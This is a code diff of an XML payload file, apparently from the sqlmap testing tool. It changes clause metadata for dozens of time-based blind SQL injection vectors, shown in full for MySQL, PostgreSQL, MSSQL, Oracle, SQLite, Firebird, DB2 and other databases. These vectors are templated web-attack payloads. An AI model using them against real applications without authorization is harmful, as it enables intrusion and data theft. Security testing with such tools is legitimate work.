<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@@ -591,7 +591,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>

166
xml/payloads/05_time_blind.xml
View File

@@ -7,7 +7,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -27,7 +27,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -47,7 +47,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -68,7 +68,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -89,7 +89,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -109,7 +109,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -129,7 +129,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -150,7 +150,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@@ -171,7 +171,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -191,7 +191,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -211,7 +211,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -232,7 +232,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -253,7 +253,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -273,7 +273,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -294,7 +294,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request>
@@ -314,7 +314,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request>
@@ -335,7 +335,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -355,7 +355,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -374,7 +374,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -394,7 +394,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -414,7 +414,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -434,7 +434,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -454,7 +454,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -475,7 +475,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -496,7 +496,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -515,7 +515,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -534,7 +534,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -554,7 +554,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -617,7 +617,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -638,7 +638,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -659,7 +659,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -681,7 +681,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -703,7 +703,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -722,7 +722,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -741,7 +741,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -761,7 +761,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -781,7 +781,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -800,7 +800,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -819,7 +819,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -839,7 +839,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -859,7 +859,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -878,7 +878,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -897,7 +897,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -917,7 +917,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -937,7 +937,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -957,7 +957,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -977,7 +977,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -998,7 +998,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -1019,7 +1019,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1039,7 +1039,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1059,7 +1059,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1080,7 +1080,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1101,7 +1101,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1120,7 +1120,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1139,7 +1139,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1159,7 +1159,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1179,7 +1179,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1199,7 +1199,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1219,7 +1219,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1240,7 +1240,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1261,7 +1261,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1281,7 +1281,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1301,7 +1301,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1322,7 +1322,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1390,7 +1390,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request>
@@ -1410,7 +1410,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -1430,7 +1430,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request>
@@ -1450,7 +1450,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
<request>
@@ -1469,7 +1469,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -1488,7 +1488,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -1507,7 +1507,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -1527,7 +1527,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -1546,7 +1546,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request>
@@ -1567,7 +1567,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
<request>
@@ -1589,7 +1589,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<request>
@@ -1608,7 +1608,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request>
@@ -1627,7 +1627,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request>
@@ -1646,7 +1646,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
<request>
@@ -1666,7 +1666,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1686,7 +1686,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
